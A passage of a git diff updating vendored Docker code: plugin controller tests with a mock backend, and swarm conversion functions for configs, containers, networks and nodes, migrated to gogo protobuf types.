context.Background() + + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + if !b.p.IsEnabled() { + t.Fatal("expected plugin to be enabled") + } + + c = newTestController(b, true) + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + if b.p.IsEnabled() { + t.Fatal("expected plugin to be disabled") + } + + c = newTestController(b, false) + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + if !b.p.IsEnabled() { + t.Fatal("expected plugin to be enabled") + } +} + +func TestWaitCancel(t *testing.T) { + b := newMockBackend() + c := newTestController(b, true) + ctx := context.Background() + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + ctxCancel, cancel := context.WithCancel(ctx) + chErr := make(chan error) + go func() { + chErr <- c.Wait(ctxCancel) + }() + cancel() + select { + case err := <-chErr: + if err != context.Canceled { + t.Fatal(err) + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for cancelation") + } +} + +func TestWaitDisabled(t *testing.T) { + b := newMockBackend() + c := newTestController(b, true) + ctx := context.Background() + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + chErr := make(chan error) + go func() { + chErr <- c.Wait(ctx) + }() + + if err := b.Enable("test", nil); err != nil { + t.Fatal(err) + } + select { + case err := <-chErr: + if err == nil { + t.Fatal("expected error") + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } + + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + ctxWaitReady, cancelCtxWaitReady := context.WithTimeout(ctx, 30*time.Second) + c.signalWaitReady = cancelCtxWaitReady + defer cancelCtxWaitReady() + + go func() { + chErr <- c.Wait(ctx) + }() + + chEvent, cancel := b.SubscribeEvents(1) + defer cancel() + + if err := b.Disable("test", nil); err != nil { + t.Fatal(err) + } + + select { + case <-chEvent: + <-ctxWaitReady.Done() + if err := ctxWaitReady.Err(); err == context.DeadlineExceeded { + t.Fatal(err) + } + select { + case <-chErr: + t.Fatal("wait returned unexpectedly") + default: + // all good + } + case <-chErr: + t.Fatal("wait returned unexpectedly") + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } + + if err := b.Remove("test", nil); err != nil { + t.Fatal(err) + } + select { + case err := <-chErr: + if err == nil { + t.Fatal("expected error") + } + if !strings.Contains(err.Error(), "removed") { + t.Fatal(err) + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } +} + +func TestWaitEnabled(t *testing.T) { + b := newMockBackend() + c := newTestController(b, false) + ctx := context.Background() + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + chErr := make(chan error) + go func() { + chErr <- c.Wait(ctx) + }() + + if err := b.Disable("test", nil); err != nil { + t.Fatal(err) + } + select { + case err := <-chErr: + if err == nil { + t.Fatal("expected error") + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } + + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + ctxWaitReady, ctxWaitCancel := context.WithCancel(ctx) + c.signalWaitReady = ctxWaitCancel + defer ctxWaitCancel() + + go func() { + chErr <- c.Wait(ctx) + }() + + chEvent, cancel := b.SubscribeEvents(1) + defer cancel() + + if err := b.Enable("test", nil); err != nil { + t.Fatal(err) + } + + select { + case <-chEvent: + <-ctxWaitReady.Done() + if err := ctxWaitReady.Err(); err == context.DeadlineExceeded { + t.Fatal(err) + } + select { + case <-chErr: + t.Fatal("wait returned unexpectedly") + default: + // all good + } + case <-chErr: + t.Fatal("wait returned unexpectedly") + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } + + if err := b.Remove("test", nil); err != nil { + t.Fatal(err) + } + select { + case err := <-chErr: + if err == nil { + t.Fatal("expected error") + } + if !strings.Contains(err.Error(), "removed") { + t.Fatal(err) + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } +} + +func TestRemove(t *testing.T) { + b := newMockBackend() + c := newTestController(b, false) + ctx := context.Background() + + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Shutdown(ctx); err != nil { + t.Fatal(err) + } + + c2 := newTestController(b, false) + if err := c2.Prepare(ctx); err != nil { + t.Fatal(err) + } + + if err := c.Remove(ctx); err != nil { + t.Fatal(err) + } + if b.p == nil { + t.Fatal("plugin removed unexpectedly") + } + if err := c2.Shutdown(ctx); err != nil { + t.Fatal(err) + } + if err := c2.Remove(ctx); err != nil { + t.Fatal(err) + } + if b.p != nil { + t.Fatal("expected plugin to be removed") + } +} + +func newTestController(b Backend, disabled bool) *Controller { + return &Controller{ + logger: &logrus.Entry{Logger: &logrus.Logger{Out: ioutil.Discard}}, + backend: b, + spec: runtime.PluginSpec{ + Name: pluginTestName, + Remote: pluginTestRemote, + Disabled: disabled, + }, + } +} + +func newMockBackend() *mockBackend { + return &mockBackend{ + pub: pubsub.NewPublisher(0, 0), + } +} + +type mockBackend struct { + p *v2.Plugin + pub *pubsub.Publisher +} + +func (m *mockBackend) Disable(name string, config *enginetypes.PluginDisableConfig) error { + m.p.PluginObj.Enabled = false + m.pub.Publish(plugin.EventDisable{}) + return nil +} + +func (m *mockBackend) Enable(name string, config *enginetypes.PluginEnableConfig) error { + m.p.PluginObj.Enabled = true + m.pub.Publish(plugin.EventEnable{}) + return nil +} + +func (m *mockBackend) Remove(name string, config *enginetypes.PluginRmConfig) error { + m.p = nil + m.pub.Publish(plugin.EventRemove{}) + return nil +} + +func (m *mockBackend) Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer, opts ...plugin.CreateOpt) error { + m.p = &v2.Plugin{ + PluginObj: enginetypes.Plugin{ + ID: "1234", + Name: name, + PluginReference: ref.String(), + }, + } + return nil +} + +func (m *mockBackend) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error { + m.p.PluginObj.PluginReference = pluginTestRemoteUpgrade + return nil +} + +func (m *mockBackend) Get(name string) (*v2.Plugin, error) { + if m.p == nil { + return nil, errors.New("not found") + } + return m.p, nil +} + +func (m *mockBackend) SubscribeEvents(buffer int, events ...plugin.Event) (eventCh <-chan interface{}, cancel func()) { + ch := m.pub.SubscribeTopicWithBuffer(nil, buffer) + cancel = func() { m.pub.Evict(ch) } + return ch, cancel +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/config.go b/vendor/github.com/docker/docker/daemon/cluster/convert/config.go new file mode 100644 index 0000000000..16b3475af8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/config.go @@ -0,0 +1,78 @@ +package convert // import "github.com/docker/docker/daemon/cluster/convert" + +import ( + swarmtypes "github.com/docker/docker/api/types/swarm" + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + gogotypes "github.com/gogo/protobuf/types" +) + +// ConfigFromGRPC converts a grpc Config to a Config. +func ConfigFromGRPC(s *swarmapi.Config) swarmtypes.Config { + config := swarmtypes.Config{ + ID: s.ID, + Spec: swarmtypes.ConfigSpec{ + Annotations: annotationsFromGRPC(s.Spec.Annotations), + Data: s.Spec.Data, + }, + } + + config.Version.Index = s.Meta.Version.Index + // Meta + config.CreatedAt, _ = gogotypes.TimestampFromProto(s.Meta.CreatedAt) + config.UpdatedAt, _ = gogotypes.TimestampFromProto(s.Meta.UpdatedAt) + + if s.Spec.Templating != nil { + config.Spec.Templating = &types.Driver{ + Name: s.Spec.Templating.Name, + Options: s.Spec.Templating.Options, + } + } + + return config +} + +// ConfigSpecToGRPC converts Config to a grpc Config. +func ConfigSpecToGRPC(s swarmtypes.ConfigSpec) swarmapi.ConfigSpec { + spec := swarmapi.ConfigSpec{ + Annotations: swarmapi.Annotations{ + Name: s.Name, + Labels: s.Labels, + }, + Data: s.Data, + } + + if s.Templating != nil { + spec.Templating = &swarmapi.Driver{ + Name: s.Templating.Name, + Options: s.Templating.Options, + } + } + + return spec +} + +// ConfigReferencesFromGRPC converts a slice of grpc ConfigReference to ConfigReference +func ConfigReferencesFromGRPC(s []*swarmapi.ConfigReference) []*swarmtypes.ConfigReference { + refs := []*swarmtypes.ConfigReference{} + + for _, r := range s { + ref := &swarmtypes.ConfigReference{ + ConfigID: r.ConfigID, + ConfigName: r.ConfigName, + } + + if t, ok := r.Target.(*swarmapi.ConfigReference_File); ok { + ref.File = &swarmtypes.ConfigReferenceFileTarget{ + Name: t.File.Name, + UID: t.File.UID, + GID: t.File.GID, + Mode: t.File.Mode, + } + } + + refs = append(refs, ref) + } + + return refs +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/container.go b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go index 10383f749b..d889b4004c 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/container.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go @@ -1,32 +1,41 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( + "errors" "fmt" "strings" - "github.com/Sirupsen/logrus" - container "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" + "github.com/sirupsen/logrus" ) -func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { - containerSpec := types.ContainerSpec{ - Image: c.Image, - Labels: c.Labels, - Command: c.Command, - Args: c.Args, - Hostname: c.Hostname, - Env: c.Env, - Dir: c.Dir, - User: c.User, - Groups: c.Groups, - TTY: c.TTY, - OpenStdin: c.OpenStdin, - Hosts: c.Hosts, - Secrets: secretReferencesFromGRPC(c.Secrets), +func containerSpecFromGRPC(c *swarmapi.ContainerSpec) *types.ContainerSpec { + if c == nil { + return nil + } + containerSpec := &types.ContainerSpec{ + Image: c.Image, + Labels: c.Labels, + Command: c.Command, + Args: c.Args, + Hostname: c.Hostname, + Env: c.Env, + Dir: c.Dir, + User: c.User, + Groups: c.Groups, + StopSignal: c.StopSignal, + TTY: c.TTY, + OpenStdin: c.OpenStdin, + ReadOnly: c.ReadOnly, + Hosts: c.Hosts, + Secrets: secretReferencesFromGRPC(c.Secrets), + Configs: configReferencesFromGRPC(c.Configs), + Isolation: IsolationFromGRPC(c.Isolation), + Init: initFromGRPC(c.Init), } if c.DNSConfig != nil { @@ -37,6 +46,31 @@ func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { } } + // Privileges + if c.Privileges != nil { + containerSpec.Privileges = &types.Privileges{} + + if c.Privileges.CredentialSpec != nil { + containerSpec.Privileges.CredentialSpec = &types.CredentialSpec{} + switch c.Privileges.CredentialSpec.Source.(type) { + case *swarmapi.Privileges_CredentialSpec_File: + containerSpec.Privileges.CredentialSpec.File = c.Privileges.CredentialSpec.GetFile() + case *swarmapi.Privileges_CredentialSpec_Registry: + containerSpec.Privileges.CredentialSpec.Registry = c.Privileges.CredentialSpec.GetRegistry() + } + } + + if c.Privileges.SELinuxContext != nil { + containerSpec.Privileges.SELinuxContext = &types.SELinuxContext{ + Disable: c.Privileges.SELinuxContext.Disable, + User: c.Privileges.SELinuxContext.User, + Type: c.Privileges.SELinuxContext.Type, + Role: c.Privileges.SELinuxContext.Role, + Level: c.Privileges.SELinuxContext.Level, + } + } + } + // Mounts for _, m := range c.Mounts { mount := mounttypes.Mount{ @@ -75,7 +109,7 @@ func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { } if c.StopGracePeriod != nil { - grace, _ := ptypes.Duration(c.StopGracePeriod) + grace, _ := gogotypes.DurationFromProto(c.StopGracePeriod) containerSpec.StopGracePeriod = &grace } @@ -86,6 +120,21 @@ func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { return containerSpec } +func initFromGRPC(v *gogotypes.BoolValue) *bool { + if v == nil { + return nil + } + value := v.GetValue() + return &value +} + +func initToGRPC(v *bool) *gogotypes.BoolValue { + if v == nil { + return nil + } + return &gogotypes.BoolValue{Value: *v} +} + func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretReference { refs := make([]*swarmapi.SecretReference, 0, len(sr)) for _, s := range sr { @@ -95,7 +144,7 @@ func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretRefer } if s.File != nil { ref.Target = &swarmapi.SecretReference_File{ - File: &swarmapi.SecretReference_FileTarget{ + File: &swarmapi.FileTarget{ Name: s.File.Name, UID: s.File.UID, GID: s.File.GID, @@ -109,6 +158,7 @@ func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretRefer return refs } + func secretReferencesFromGRPC(sr []*swarmapi.SecretReference) []*types.SecretReference { refs := make([]*types.SecretReference, 0, len(sr)) for _, s := range sr { @@ -133,21 +183,74 @@ func secretReferencesFromGRPC(sr []*swarmapi.SecretReference) []*types.SecretRef return refs } -func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) { +func configReferencesToGRPC(sr []*types.ConfigReference) []*swarmapi.ConfigReference { + refs := make([]*swarmapi.ConfigReference, 0, len(sr)) + for _, s := range sr { + ref := &swarmapi.ConfigReference{ + ConfigID: s.ConfigID, + ConfigName: s.ConfigName, + } + if s.File != nil { + ref.Target = &swarmapi.ConfigReference_File{ + File: &swarmapi.FileTarget{ + Name: s.File.Name, + UID: s.File.UID, + GID: s.File.GID, + Mode: s.File.Mode, + }, + } + } + + refs = append(refs, ref) + } + + return refs +} + +func configReferencesFromGRPC(sr []*swarmapi.ConfigReference) []*types.ConfigReference { + refs := make([]*types.ConfigReference, 0, len(sr)) + for _, s := range sr { + target := s.GetFile() + if target == nil { + // not a file target + logrus.Warnf("config target not a file: config=%s", s.ConfigID) + continue + } + refs = append(refs, &types.ConfigReference{ + File: &types.ConfigReferenceFileTarget{ + Name: target.Name, + UID: target.UID, + GID: target.GID, + Mode: target.Mode, + }, + ConfigID: s.ConfigID, + ConfigName: s.ConfigName, + }) + } + + return refs +} + +func containerToGRPC(c *types.ContainerSpec) (*swarmapi.ContainerSpec, error) { containerSpec := &swarmapi.ContainerSpec{ - Image: c.Image, - Labels: c.Labels, - Command: c.Command, - Args: c.Args, - Hostname: c.Hostname, - Env: c.Env, - Dir: c.Dir, - User: c.User, - Groups: c.Groups, - TTY: c.TTY, - OpenStdin: c.OpenStdin, - Hosts: c.Hosts, - Secrets: secretReferencesToGRPC(c.Secrets), + Image: c.Image, + Labels: c.Labels, + Command: c.Command, + Args: c.Args, + Hostname: c.Hostname, + Env: c.Env, + Dir: c.Dir, + User: c.User, + Groups: c.Groups, + StopSignal: c.StopSignal, + TTY: c.TTY, + OpenStdin: c.OpenStdin, + ReadOnly: c.ReadOnly, + Hosts: c.Hosts, + Secrets: secretReferencesToGRPC(c.Secrets), + Configs: configReferencesToGRPC(c.Configs), + Isolation: isolationToGRPC(c.Isolation), + Init: initToGRPC(c.Init), } if c.DNSConfig != nil { @@ -159,7 +262,41 @@ func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) { } if c.StopGracePeriod != nil { - containerSpec.StopGracePeriod = ptypes.DurationProto(*c.StopGracePeriod) + containerSpec.StopGracePeriod = gogotypes.DurationProto(*c.StopGracePeriod) + } + + // Privileges + if c.Privileges != nil { + containerSpec.Privileges = &swarmapi.Privileges{} + + if c.Privileges.CredentialSpec != nil { + containerSpec.Privileges.CredentialSpec = &swarmapi.Privileges_CredentialSpec{} + + if c.Privileges.CredentialSpec.File != "" && c.Privileges.CredentialSpec.Registry != "" { + return nil, errors.New("cannot specify both \"file\" and \"registry\" credential specs") + } + if c.Privileges.CredentialSpec.File != "" { + containerSpec.Privileges.CredentialSpec.Source = &swarmapi.Privileges_CredentialSpec_File{ + File: c.Privileges.CredentialSpec.File, + } + } else if c.Privileges.CredentialSpec.Registry != "" { + containerSpec.Privileges.CredentialSpec.Source = &swarmapi.Privileges_CredentialSpec_Registry{ + Registry: c.Privileges.CredentialSpec.Registry, + } + } else { + return nil, errors.New("must either provide \"file\" or \"registry\" for credential spec") + } + } + + if c.Privileges.SELinuxContext != nil { + containerSpec.Privileges.SELinuxContext = &swarmapi.Privileges_SELinuxContext{ + Disable: c.Privileges.SELinuxContext.Disable, + User: c.Privileges.SELinuxContext.User, + Type: c.Privileges.SELinuxContext.Type, + Role: c.Privileges.SELinuxContext.Role, + Level: c.Privileges.SELinuxContext.Level, + } + } } // Mounts @@ -215,21 +352,47 @@ func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) { } func healthConfigFromGRPC(h *swarmapi.HealthConfig) *container.HealthConfig { - interval, _ := ptypes.Duration(h.Interval) - timeout, _ := ptypes.Duration(h.Timeout) + interval, _ := gogotypes.DurationFromProto(h.Interval) + timeout, _ := gogotypes.DurationFromProto(h.Timeout) + startPeriod, _ := gogotypes.DurationFromProto(h.StartPeriod) return &container.HealthConfig{ - Test: h.Test, - Interval: interval, - Timeout: timeout, - Retries: int(h.Retries), + Test: h.Test, + Interval: interval, + Timeout: timeout, + Retries: int(h.Retries), + StartPeriod: startPeriod, } } func healthConfigToGRPC(h *container.HealthConfig) *swarmapi.HealthConfig { return &swarmapi.HealthConfig{ - Test: h.Test, - Interval: ptypes.DurationProto(h.Interval), - Timeout: ptypes.DurationProto(h.Timeout), - Retries: int32(h.Retries), + Test: h.Test, + Interval: gogotypes.DurationProto(h.Interval), + Timeout: gogotypes.DurationProto(h.Timeout), + Retries: int32(h.Retries), + StartPeriod: gogotypes.DurationProto(h.StartPeriod), + } +} + +// IsolationFromGRPC converts a swarm api container isolation to a moby isolation representation +func IsolationFromGRPC(i swarmapi.ContainerSpec_Isolation) container.Isolation { + switch i { + case swarmapi.ContainerIsolationHyperV: + return container.IsolationHyperV + case swarmapi.ContainerIsolationProcess: + return container.IsolationProcess + case swarmapi.ContainerIsolationDefault: + return container.IsolationDefault + } + return container.IsolationEmpty +} + +func isolationToGRPC(i container.Isolation) swarmapi.ContainerSpec_Isolation { + if i.IsHyperV() { + return swarmapi.ContainerIsolationHyperV + } + if i.IsProcess() { + return swarmapi.ContainerIsolationProcess } + return swarmapi.ContainerIsolationDefault } diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/network.go b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go index 4d21b4df0a..34660fc4ff 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/network.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go @@ -1,4 +1,4 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "strings" @@ -6,11 +6,12 @@ import ( basictypes "github.com/docker/docker/api/types" networktypes "github.com/docker/docker/api/types/network" types "github.com/docker/docker/api/types/swarm" + netconst "github.com/docker/libnetwork/datastore" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" ) -func networkAttachementFromGRPC(na *swarmapi.NetworkAttachment) types.NetworkAttachment { +func networkAttachmentFromGRPC(na *swarmapi.NetworkAttachment) types.NetworkAttachment { if na != nil { return types.NetworkAttachment{ Network: networkFromGRPC(na.Network), @@ -28,19 +29,26 @@ func networkFromGRPC(n *swarmapi.Network) types.Network { IPv6Enabled: n.Spec.Ipv6Enabled, Internal: n.Spec.Internal, Attachable: n.Spec.Attachable, + Ingress: IsIngressNetwork(n), IPAMOptions: ipamFromGRPC(n.Spec.IPAM), + Scope: netconst.SwarmScope, }, IPAMOptions: ipamFromGRPC(n.IPAM), } + if n.Spec.GetNetwork() != "" { + network.Spec.ConfigFrom = &networktypes.ConfigReference{ + Network: n.Spec.GetNetwork(), + } + } + // Meta network.Version.Index = n.Meta.Version.Index - network.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt) - network.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt) + network.CreatedAt, _ = gogotypes.TimestampFromProto(n.Meta.CreatedAt) + network.UpdatedAt, _ = gogotypes.TimestampFromProto(n.Meta.UpdatedAt) //Annotations - network.Spec.Name = n.Spec.Annotations.Name - network.Spec.Labels = n.Spec.Annotations.Labels + network.Spec.Annotations = annotationsFromGRPC(n.Spec.Annotations) //DriverConfiguration if n.Spec.DriverConfig != nil { @@ -90,13 +98,7 @@ func endpointSpecFromGRPC(es *swarmapi.EndpointSpec) *types.EndpointSpec { endpointSpec.Mode = types.ResolutionMode(strings.ToLower(es.Mode.String())) for _, portState := range es.Ports { - endpointSpec.Ports = append(endpointSpec.Ports, types.PortConfig{ - Name: portState.Name, - Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])), - PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])), - TargetPort: portState.TargetPort, - PublishedPort: portState.PublishedPort, - }) + endpointSpec.Ports = append(endpointSpec.Ports, swarmPortConfigToAPIPortConfig(portState)) } } return endpointSpec @@ -110,13 +112,7 @@ func endpointFromGRPC(e *swarmapi.Endpoint) types.Endpoint { } for _, portState := range e.Ports { - endpoint.Ports = append(endpoint.Ports, types.PortConfig{ - Name: portState.Name, - Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])), - PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])), - TargetPort: portState.TargetPort, - PublishedPort: portState.PublishedPort, - }) + endpoint.Ports = append(endpoint.Ports, swarmPortConfigToAPIPortConfig(portState)) } for _, v := range e.VirtualIPs { @@ -130,17 +126,27 @@ func endpointFromGRPC(e *swarmapi.Endpoint) types.Endpoint { return endpoint } +func swarmPortConfigToAPIPortConfig(portConfig *swarmapi.PortConfig) types.PortConfig { + return types.PortConfig{ + Name: portConfig.Name, + Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portConfig.Protocol)])), + PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portConfig.PublishMode)])), + TargetPort: portConfig.TargetPort, + PublishedPort: portConfig.PublishedPort, + } +} + // BasicNetworkFromGRPC converts a grpc Network to a NetworkResource. func BasicNetworkFromGRPC(n swarmapi.Network) basictypes.NetworkResource { spec := n.Spec var ipam networktypes.IPAM - if spec.IPAM != nil { - if spec.IPAM.Driver != nil { - ipam.Driver = spec.IPAM.Driver.Name - ipam.Options = spec.IPAM.Driver.Options + if n.IPAM != nil { + if n.IPAM.Driver != nil { + ipam.Driver = n.IPAM.Driver.Name + ipam.Options = n.IPAM.Driver.Options } - ipam.Config = make([]networktypes.IPAMConfig, 0, len(spec.IPAM.Configs)) - for _, ic := range spec.IPAM.Configs { + ipam.Config = make([]networktypes.IPAMConfig, 0, len(n.IPAM.Configs)) + for _, ic := range n.IPAM.Configs { ipamConfig := networktypes.IPAMConfig{ Subnet: ic.Subnet, IPRange: ic.Range, @@ -154,13 +160,21 @@ func BasicNetworkFromGRPC(n swarmapi.Network) basictypes.NetworkResource { nr := basictypes.NetworkResource{ ID: n.ID, Name: n.Spec.Annotations.Name, - Scope: "swarm", + Scope: netconst.SwarmScope, EnableIPv6: spec.Ipv6Enabled, IPAM: ipam, Internal: spec.Internal, Attachable: spec.Attachable, + Ingress: IsIngressNetwork(&n), Labels: n.Spec.Annotations.Labels, } + nr.Created, _ = gogotypes.TimestampFromProto(n.Meta.CreatedAt) + + if n.Spec.GetNetwork() != "" { + nr.ConfigFrom = networktypes.ConfigReference{ + Network: n.Spec.GetNetwork(), + } + } if n.DriverState != nil { nr.Driver = n.DriverState.Name @@ -184,6 +198,7 @@ func BasicNetworkCreateToGRPC(create basictypes.NetworkCreateRequest) swarmapi.N Ipv6Enabled: create.EnableIPv6, Internal: create.Internal, Attachable: create.Attachable, + Ingress: create.Ingress, } if create.IPAM != nil { driver := create.IPAM.Driver @@ -206,5 +221,20 @@ func BasicNetworkCreateToGRPC(create basictypes.NetworkCreateRequest) swarmapi.N } ns.IPAM.Configs = ipamSpec } + if create.ConfigFrom != nil { + ns.ConfigFrom = &swarmapi.NetworkSpec_Network{ + Network: create.ConfigFrom.Network, + } + } return ns } + +// IsIngressNetwork check if the swarm network is an ingress network +func IsIngressNetwork(n *swarmapi.Network) bool { + if n.Spec.Ingress { + return true + } + // Check if legacy defined ingress network + _, ok := n.Spec.Annotations.Labels["com.docker.swarm.internal"] + return ok && n.Spec.Annotations.Name == "ingress" +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go b/vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go new file mode 100644 index 0000000000..42f70696b7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/network_test.go @@ -0,0 +1,34 @@ +package convert // import "github.com/docker/docker/daemon/cluster/convert" + +import ( + "testing" + "time" + + swarmapi "github.com/docker/swarmkit/api" + gogotypes "github.com/gogo/protobuf/types" +) + +func TestNetworkConvertBasicNetworkFromGRPCCreatedAt(t *testing.T) { + expected, err := time.Parse("Jan 2, 2006 at 3:04pm (MST)", "Jan 10, 2018 at 7:54pm (PST)") + if err != nil { + t.Fatal(err) + } + createdAt, err := gogotypes.TimestampProto(expected) + if err != nil { + t.Fatal(err) + } + + nw := swarmapi.Network{ + Meta: swarmapi.Meta{ + Version: swarmapi.Version{ + Index: 1, + }, + CreatedAt: createdAt, + }, + } + + n := BasicNetworkFromGRPC(nw) + if !n.Created.Equal(expected) { + t.Fatalf("expected time %s; received %s", expected, n.Created) + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/node.go b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go index 306f34e0b2..00636b6ab4 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/node.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go @@ -1,4 +1,4 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "fmt" @@ -6,7 +6,7 @@ import ( types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" ) // NodeFromGRPC converts a grpc Node to a Node. @@ -14,7 +14,7 @@ func NodeFromGRPC(n swarmapi.Node) types.Node { node := types.Node{ ID: n.ID, Spec: types.NodeSpec{ - Role: types.NodeRole(strings.ToLower(n.Spec.Role.String())), + Role: types.NodeRole(strings.ToLower(n.Spec.DesiredRole.String())), Availability: types.NodeAvailability(strings.ToLower(n.Spec.Availability.String())), }, Status: types.NodeStatus{ @@ -26,12 +26,11 @@ func NodeFromGRPC(n swarmapi.Node) types.Node { // Meta node.Version.Index = n.Meta.Version.Index - node.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt) - node.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt) + node.CreatedAt, _ = gogotypes.TimestampFromProto(n.Meta.CreatedAt) + node.UpdatedAt, _ = gogotypes.TimestampFromProto(n.Meta.UpdatedAt) //Annotations - node.Spec.Name = n.Spec.Annotations.Name - node.Spec.Labels = n.Spec.Annotations.Labels + node.Spec.Annotations = annotationsFromGRPC(n.Spec.Annotations) //Description if n.Description != nil { @@ -43,6 +42,7 @@ func NodeFromGRPC(n swarmapi.Node) types.Node { if n.Description.Resources != nil { node.Description.Resources.NanoCPUs = n.Description.Resources.NanoCPUs node.Description.Resources.MemoryBytes = n.Description.Resources.MemoryBytes + node.Description.Resources.GenericResources = GenericResourcesFromGRPC(n.Description.Resources.Generic) } if n.Description.Engine != nil { node.Description.Engine.EngineVersion = n.Description.Engine.EngineVersion @@ -51,6 +51,11 @@ func NodeFromGRPC(n swarmapi.Node) types.Node { node.Description.Engine.Plugins = append(node.Description.Engine.Plugins, types.PluginDescription{Type: plugin.Type, Name: plugin.Name}) } } + if n.Description.TLSInfo != nil { + node.Description.TLSInfo.TrustRoot = string(n.Description.TLSInfo.TrustRoot) + node.Description.TLSInfo.CertIssuerPublicKey = n.Description.TLSInfo.CertIssuerPublicKey + node.Description.TLSInfo.CertIssuerSubject = n.Description.TLSInfo.CertIssuerSubject + } } //Manager @@ -74,7 +79,7 @@ func NodeSpecToGRPC(s types.NodeSpec) (swarmapi.NodeSpec, error) { }, } if role, ok := swarmapi.NodeRole_value[strings.ToUpper(string(s.Role))]; ok { - spec.Role = swarmapi.NodeRole(role) + spec.DesiredRole = swarmapi.NodeRole(role) } else { return swarmapi.NodeSpec{}, fmt.Errorf("invalid Role: %q", s.Role) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go index 3e966873f4..d0e5ac45d2 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go @@ -1,9 +1,10 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( swarmtypes "github.com/docker/docker/api/types/swarm" + types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" ) // SecretFromGRPC converts a grpc Secret to a Secret. @@ 